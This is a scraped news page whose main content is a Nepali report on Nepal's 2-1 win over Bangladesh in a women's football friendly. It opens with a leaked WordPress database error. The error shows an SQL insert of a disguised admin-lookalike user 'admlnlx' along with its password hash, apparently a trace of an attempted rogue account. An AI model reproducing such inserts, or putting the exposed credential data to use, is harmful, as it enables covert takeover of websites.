WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCOPxJrRp5z/py.1VM4AAIfgcNlv6P.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 20:25:05', '', 'admlnlx', 'admlnlx')
काठमाडौं । बंगलादेशविरुद्धको मैत्रीपूर्ण खेलमा नेपालले जित हासिल गरेको छ। त्रिपुरेश्वरस्थित दशरथ रंगशालामा सम्पन्न खेलमा नेपालले बंगलादेशलाई २—१ गोलले हराएको हो ।
सुरुवातमा बंगलादेश आक्रमक देखिए पनि खेलको १४ औँ मिनेटमा सबिता राना मगरले अग्रता दिलाएसँगै नेपालले खेलकम लय समात्यो ।
२२ औँ मिनेटमा सरू लिम्बुको पासमा प्रीति राईले गोल गर्दै अग्रता दोब्बर पारिन् । खेलको २८ औँ र ३६ औँ मिनेटमा पनि प्रीतिले राम्रो अवसर बनाए पनि फिनिसिङमा चुकिन् ।
३० औँ मिनेटमा बिमला चौधरीले राम्रो अवसर बनाएकी थिइन् । पहिलो हाफको अतिरिक्त समयमा बंगलादेशकी मोसामत अलि खातुनले राम्रो क्रस गर्दै अवसर बनाए पनि नेपाली डिफेन्डरले क्लियर गरिदिएका थिए । पहिलो हाफमा नेपालले २ गोलले अग्रता लिएको थियो ।
दोस्रो हाफमा शुरुबाटै बंगलादेशले गोल फर्काउने प्रयास गरेको थियो । ५१ औँ मिनेटमा सरु लिम्बुको पासमा प्रीती राइले गोल पोस्टमा राम्रो प्रहार गरेपनि बंगलादेशी गोलकिपर रुपना चकमाले उत्कृष्ट बचाउ गरेकी थिइन् ।
७९ औँ मिनेटमा बंगलादेशकी श्रिमोटी सरकारले गरेको प्रहार गोलकिपर एन्जेला तोमबाफोले बचाए पनि ८३ औँ मिनेटमा टोहुरा खातुनले गोल फर्काइन् । खेलको अन्तिम समयमा बंगलादेशले खेलमा दबाब बनाएको थियो । अतिरिक्त समयमा पनि बंगलादेशले राम्रा अवसरहरू बनाएको थियो ।